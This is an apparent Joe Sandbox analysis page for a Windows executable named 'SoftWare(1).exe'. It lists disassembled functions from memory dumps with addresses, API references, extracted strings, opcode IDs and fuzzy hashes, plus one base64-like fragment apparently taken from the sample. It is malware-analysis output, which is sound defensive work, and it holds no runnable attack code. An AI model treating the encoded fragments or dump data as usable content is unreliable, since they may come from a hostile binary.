Instruction Fuzzy Hash: DFB1F6B6A546118FCF08CE7CC4A47DF77E2EB67321F609219D610DBB94CA2A461B9B10

Function 6CF56040 Relevance: 1.6, Strings: 1, Instructions: 307COMMON

Download Yara Rule

Strings

ti3, xrefs: 6CF5626E

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID:
String ID: ti3
API String ID: 0-3277970681
Opcode ID: 62c30616b61f5549dcc8ca6eebf053e7cbebdacf013425576afc87707b31ab76
Instruction ID: abbb16a156d18267a1f345248e9e1c2ac5ba89872bd6de1ae15117712f2251c4
Opcode Fuzzy Hash: 62c30616b61f5549dcc8ca6eebf053e7cbebdacf013425576afc87707b31ab76
Instruction Fuzzy Hash: 9FA125B2B541068FCF04CF6CD5C13EF7BF1AB56358F61451AE621EBB51C63A8A098B80

Function 6CF58C60 Relevance: 1.5, Strings: 1, Instructions: 261COMMON

Download Yara Rule

Strings

{416, xrefs: 6CF58E0E

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID:
String ID: {416
API String ID: 0-3086952422
Opcode ID: 07450f89e562a89d0d1f758ec2b53b001336a7da790b41b2a48f25f3bb9620b6
Instruction ID: 8c1a60d4aca17777466be5e0739a7e27923cde6352ddff9b884b82ba6b3bd48e
Opcode Fuzzy Hash: 07450f89e562a89d0d1f758ec2b53b001336a7da790b41b2a48f25f3bb9620b6
Instruction Fuzzy Hash: 4791D276FA41068FCF04CE6CC9D53EFBBF2AB5A354F50411BD611DB754C62A8A098B90

Function 6CF5AC30 Relevance: 1.5, Strings: 1, Instructions: 242COMMON

Download Yara Rule

Strings

9aYAAACDz1kh7wnfidWB5aYAAACJy4PjWQnrMfuAw5SIXAyEQUqB+ZsAAAB1toPAAotsJDQPt00AZoXJdBeNVQKQkJBmiQiDwAIPtwqDwgJmhcl172bHAAAAD7cMJGaFyY, xrefs: 6CF5ACF3, 6CF5AE73, 6CF5AEF2

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID:
String ID: 9aYAAACDz1kh7wnfidWB5aYAAACJy4PjWQnrMfuAw5SIXAyEQUqB+ZsAAAB1toPAAotsJDQPt00AZoXJdBeNVQKQkJBmiQiDwAIPtwqDwgJmhcl172bHAAAAD7cMJGaFyY
API String ID: 0-2615491277
Opcode ID: 14c48696cb473468c11bcae01632a58af26a740e54266cf290b92def985dca55
Instruction ID: 065ef603fc991fe6012d88898fe0be87380f9d280da2df23eadb0d7b10205d75
Opcode Fuzzy Hash: 14c48696cb473468c11bcae01632a58af26a740e54266cf290b92def985dca55
Instruction Fuzzy Hash: F281E476E446058FCF04CEBCD4D57EF7BF2AB1A324F10511AE911EB780C23A99298B60

Function 6CF54DC0 Relevance: 1.5, Strings: 1, Instructions: 229COMMON

Download Yara Rule

Strings

x`<, xrefs: 6CF54E15

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID:
String ID: x`<
API String ID: 0-1043487406
Opcode ID: 48d9d815030fc239d70a7332c7fdbfcaaa224dad5b1ee6a7e8b0f13a048dc145
Instruction ID: 625652e8ad73e455d8639243b44140fc2ff539c3fef5454c2230f6e2e932eae0
Opcode Fuzzy Hash: 48d9d815030fc239d70a7332c7fdbfcaaa224dad5b1ee6a7e8b0f13a048dc145
Instruction Fuzzy Hash: 4381F176B042458FCF04CEBCC8907EE7FF1AB6A324F10451ADA11E7B90D63A9918CB91

Function 6CF66C90 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 6CF66C90

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 76573dec74132a83eba813af9df8a19dde3d1d87c07cfb2e11eaacd6df5c5126
Instruction ID: ca7454f65ee52bca6f0a127916a0e63090ede522ee86fecf05b957c3eb02ea6c
Opcode Fuzzy Hash: 76573dec74132a83eba813af9df8a19dde3d1d87c07cfb2e11eaacd6df5c5126
Instruction Fuzzy Hash: 47A01230B122008B5BC08E35460531A36B8554218030540555010C1120D62041409700

Function 6CF56F40 Relevance: .6, Instructions: 600COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0dafd26ab361c97a8c7a728a8dcc20dfdf5e1be58f7b219f7ab0619d6ef5b490
Instruction ID: f7982534154788b83233832f87f106c62860fd332d134df0e6da086041304e43
Opcode Fuzzy Hash: 0dafd26ab361c97a8c7a728a8dcc20dfdf5e1be58f7b219f7ab0619d6ef5b490
Instruction Fuzzy Hash: AB22ED76E242058FCB04CFACE5806DEBBF1AF5A314F50812AE914EB794D735A859CB81

Function 6CF56490 Relevance: .5, Instructions: 461COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53974255c661e9172ec21d3e5f9f693a76ef0bd73a05cf4d816ee622cbb5600
Instruction ID: 755abf6b2e01936fa4f674583c76d311f1bb5aa42fa2ea8e722b280f78252518
Opcode Fuzzy Hash: f53974255c661e9172ec21d3e5f9f693a76ef0bd73a05cf4d816ee622cbb5600
Instruction Fuzzy Hash: 8CF1247AA41204CFCB08CEACC6907DFBBF2BB56310F50911AFA25DB758C63599158B41

Function 6CF542C0 Relevance: .4, Instructions: 361COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5f19c1703ad830909260aa693c5a0f76851f3722779f089b169d016c4bcc260
Instruction ID: a422c571e66016daffbde518dc7e446769ac975b0b7dced764c15deade5d3f62
Opcode Fuzzy Hash: c5f19c1703ad830909260aa693c5a0f76851f3722779f089b169d016c4bcc260
Instruction Fuzzy Hash: 3ED1F536E441099FCB04CEACD4802EEBFF1EB66355FA4411AEA15E7B58C239C9B5CB11

Function 6CF5E440 Relevance: .4, Instructions: 356COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d098bec988fa6e1aa790e4143887c96b4f4111a392a280d69252bb8b1ef857d7
Instruction ID: fd49b9ccacb6156a536d1faca7c8587afa4a959e1c7eb723a5e1eb2c394cb8b0
Opcode Fuzzy Hash: d098bec988fa6e1aa790e4143887c96b4f4111a392a280d69252bb8b1ef857d7
Instruction Fuzzy Hash: A6C1F476F542198FCF04CEACC8957CEBBF2AB66315F54511AEA21EB784C23998058B80

Function 6CF5C4B0 Relevance: .3, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ceb10d13f7477519cc1494abea58c5aaa6bb67ac0e22d8fd69ece068cc32e334
Instruction ID: e11f0a5778a84373d000e8aa1dcef72ab7f743f00dc904628347149c93c6bf24
Opcode Fuzzy Hash: ceb10d13f7477519cc1494abea58c5aaa6bb67ac0e22d8fd69ece068cc32e334
Instruction Fuzzy Hash: 60B10F76F002458FCF08DEBCC8917DE7BF2AB2E324F115119D912A7B84C63A9908CB54

Function 6CF550D0 Relevance: .3, Instructions: 311COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5ccdf27d733394c983ea60aa7b48774ab1fb349ff700cc2a2bf567d7526de84
Instruction ID: c6654a92317381358af4c209209210a1e9219550dbf3563c6e13862f96b16487
Opcode Fuzzy Hash: d5ccdf27d733394c983ea60aa7b48774ab1fb349ff700cc2a2bf567d7526de84
Instruction Fuzzy Hash: 84C16576A15208CFCB04CFACD890A9EBFF2AF5A304F904119E605EB724C735AD1ACB41

Function 6CF57EB0 Relevance: .3, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f47ee0dc320fe679e0ac4cd679f4c86832d22931f804bb9d3ab29c886e58ebb1
Instruction ID: 401e85c5a45ed7c89cefef00b2bc8d2c6ae2e63fb2b217611de2d62b6a57520c
Opcode Fuzzy Hash: f47ee0dc320fe679e0ac4cd679f4c86832d22931f804bb9d3ab29c886e58ebb1
Instruction Fuzzy Hash: 46B1FFB2E606058FCB08DFBCD4957DE7BF2AB5A320F10451AEA11EB794C7364909CB51

Function 6CF58390 Relevance: .3, Instructions: 258COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 724e777b32c5fab30fec627fe0c3fefa611b2e7b306e0cdd75189ce22c3ea536
Instruction ID: ebc417e7263d86f9a27d1334b48d1a0e27ff348c88923b14734e84436eb1bf86
Opcode Fuzzy Hash: 724e777b32c5fab30fec627fe0c3fefa611b2e7b306e0cdd75189ce22c3ea536
Instruction Fuzzy Hash: 4291BC76EA02098FCB04CFACD4857DFBBF1AF5A320F50412AE911EB794C6399909CB51

Function 6CF57B00 Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d23387675d7c4ce33c564d1ec7dceb5a97d2f5c523b33994e8045f4cdbd9abc0
Instruction ID: 5c1812964819cd42b555548245c5a54ffc29b82ab0638105c74f9156a0cf4828
Opcode Fuzzy Hash: d23387675d7c4ce33c564d1ec7dceb5a97d2f5c523b33994e8045f4cdbd9abc0
Instruction Fuzzy Hash: 38817B72F646058FCF04CE3CC5E57DF7BF6AB26324F21910AD6219BB94C63A4A098B51

Function 6CF59000 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86b2c899f3bb123678c7376c2f0e1547688d8965bf2b4346acf9020f75326259
Instruction ID: 4c9477212232fedde140c22248ade54476424e5c62aa018a1792840bea3259dc
Opcode Fuzzy Hash: 86b2c899f3bb123678c7376c2f0e1547688d8965bf2b4346acf9020f75326259
Instruction Fuzzy Hash: 1E7108B2B546018FDF08CE7CC8E53EF7BE2AB57334F105619C6219B690CA2B460B8B50

Function 6CF58930 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2d5c76576e47c6d64571160471f111ae9e73ff9286f70a06b04c74ea6e2dd9c
Instruction ID: a3824b32d96c66ae17d04313ae2af4c3aa0e768998008ad966c8e5d903c24aa6
Opcode Fuzzy Hash: f2d5c76576e47c6d64571160471f111ae9e73ff9286f70a06b04c74ea6e2dd9c
Instruction Fuzzy Hash: 656168B6E642099FCF08CFBCC5916EEBBF2AB5E310F10812AE905E7764D63599048B51

Function 6CF5EB60 Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d1a691d8cb1e96ab954bad006ac6cf2ecffadf68dd6db9570aed009eedcd4cd
Instruction ID: 95a27f1420a97e0974ff84f2e40599f9d074e4490077b98061b723ae9d1ebcc3
Opcode Fuzzy Hash: 4d1a691d8cb1e96ab954bad006ac6cf2ecffadf68dd6db9570aed009eedcd4cd
Instruction Fuzzy Hash: 15519BB5E102098FCF04CFACC5947DEBBF1FB5A320F10911AD925AB794D33999058BA5

Function 6CF55E30 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44b618531c2a590e5fc4854d1e2ca6850edb84164b1145bcaff877bd9b4972d8
Instruction ID: 67a3f79b2f5113e2b48cc014cdf28050334f102b7184de751f031740c9d613ae
Opcode Fuzzy Hash: 44b618531c2a590e5fc4854d1e2ca6850edb84164b1145bcaff877bd9b4972d8
Instruction Fuzzy Hash: 4A51E3B2F192458FCF04CE7CC4947EF7BF1AB6A324F508119D921E7740C23A96098B61

Function 6CF628FA Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

type_info::operator==.LIBVCRUNTIME ref: 6CF62A19
___TypeMatch.LIBVCRUNTIME ref: 6CF62B27
_UnwindNestedFrames.LIBCMT ref: 6CF62C79
CallUnexpected.LIBVCRUNTIME ref: 6CF62C94

Strings

csm, xrefs: 6CF62937
csm, xrefs: 6CF629A4
csm, xrefs: 6CF62A50

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2751267872-393685449
Opcode ID: 71119f9f92cf84cf4f1c6e8bd3d2b7de4e562fd407fddaaff7bf10a1aba81f17
Instruction ID: a1ed9aa18c6ae0a9faa7fb42724afab08cd8855404ebe26482dab5dc921e6f60
Opcode Fuzzy Hash: 71119f9f92cf84cf4f1c6e8bd3d2b7de4e562fd407fddaaff7bf10a1aba81f17
Instruction Fuzzy Hash: 9EB19A71D0120AEFCF15CFA6C88499EB7B5FF04328B15865AE810ABF12D732DA55CB91

Function 6CF668BF Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,6CF669CE,00000000,6CF644C7,00000000,00000000,00000001,?,6CF66B47,00000022,FlsSetValue,6CF6F530,6CF6F538,00000000), ref: 6CF66980

Strings

api-ms-, xrefs: 6CF66916
ext-ms-, xrefs: 6CF6692A

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 81939f34158222fa23549c2be7803609c8e9761c28a756a2a9b9226df3ca34df
Instruction ID: 2c0d296579c37b5a2b4e3c742f9c8d19640cf8e29e6458a6b21cc466608bd191
Opcode Fuzzy Hash: 81939f34158222fa23549c2be7803609c8e9761c28a756a2a9b9226df3ca34df
Instruction Fuzzy Hash: 2C21C032E11211ABDB119A678C50B5A7B789B427A8F240621FD66E7E85E630E905C7E0

Function 6CF61F4C Relevance: 9.1, APIs: 6, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(00000001,?,6CF61B81,6CF5F458,6CF5EE1F,?,6CF5F057,?,00000001,?,?,00000001,?,6CF72F88,0000000C,6CF5F150), ref: 6CF61F5A
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6CF61F68
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6CF61F81
SetLastError.KERNEL32(00000000,6CF5F057,?,00000001,?,?,00000001,?,6CF72F88,0000000C,6CF5F150,?,00000001,?), ref: 6CF61FD3

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 96c21c87ea7a6c1702937477f3e690d6d74a70b6d47eeb55428d11cda132362d
Instruction ID: e44154cf3247862b19fce376d3da3979a2ea1b87c387b9cecab8630e8d44b86a
Opcode Fuzzy Hash: 96c21c87ea7a6c1702937477f3e690d6d74a70b6d47eeb55428d11cda132362d
Instruction Fuzzy Hash: BD01D836B1D2116DA7542577AC886A736B4DB023BC320432AF52497ED1EF62C8156284

Function 6CF65AF3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\SoftWare(1).exe, xrefs: 6CF65B0F

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID:
String ID: C:\Users\user\Desktop\SoftWare(1).exe
API String ID: 0-3098351247
Opcode ID: 213465e00d306d8f4bd11383dcf93f931283fc27ba923bce912fc7cc50e4e7a2
Instruction ID: aeeaef46d59792834c99dfe8dc3fc22a36e71258c9392b1a9829aff1c19c732e
Opcode Fuzzy Hash: 213465e00d306d8f4bd11383dcf93f931283fc27ba923bce912fc7cc50e4e7a2
Instruction Fuzzy Hash: AE218E31604209AFDB109F77CC90D9BB7B9FF023687145654E928B7E52EB70EC4487A0

Function 6CF63DF5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

